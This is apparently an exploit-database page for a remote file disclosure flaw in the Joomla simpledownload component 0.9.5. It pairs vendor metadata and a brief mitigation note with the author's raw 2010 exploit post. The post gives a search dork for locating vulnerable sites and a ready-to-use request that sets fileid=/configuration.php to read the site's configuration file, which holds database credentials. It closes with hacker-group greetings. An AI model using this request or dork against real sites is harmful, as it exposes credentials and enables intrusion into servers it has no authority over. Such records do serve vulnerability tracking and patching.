Joomla Component simpledownload Remote File Disclouse

vendor:

Joomla Component simpledownload

by:

altbta

7,5

CVSS

HIGH

Remote File Disclouse

200

CWE

Product Name: Joomla Component simpledownload

Affected Version From: 0.9.5

Affected Version To: 0.9.5

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla_component_simpledownload

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component simpledownload Remote File Disclouse

A vulnerability in Joomla Component simpledownload allows an attacker to remotely disclose files from the server. An attacker can send a specially crafted HTTP request containing a malicious fileid parameter to the vulnerable server and disclose files from the server.

Mitigation:

Update to the latest version of Joomla Component simpledownload.

Source

Exploit-DB raw data:

[!]==========================================[!]

[~] Joomla Component simpledownload Remote File Disclouse
[~] Author : altbta (l_9@hotmail.com)
[~] Homepage : [ v4-team.com ] & [ xp10.me ]
[~] Date : 16 Mei, 2010

[!]==========================================[!]

[ Software Information ]

[+] Vendor : http://joomla.joelrowley.com/
[+] Price : free
[+] Vulnerability : Remote File Disclouse
[+] Dork : inurl:"com_simpledownload" ;)
[+] Version : 0.9.5 maybe lower also affected

[!]==========================================[!]

===[ Exploit ]===

http://site/index.php?option=com_simpledownload&task=download&fileid=[file]
http://site/index.php?option=com_simpledownload&task=download&fileid=/configuration.php

[!]=========~~{  altbta }~~=========[!]

RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & &#1575;&#1576;&#1608; &#1575;&#1604;&#1580;&#1575;&#1586;&#1610; & &#1575;&#1608;&#1585;&#1606;&#1580; &#1605;&#1575;&#1606;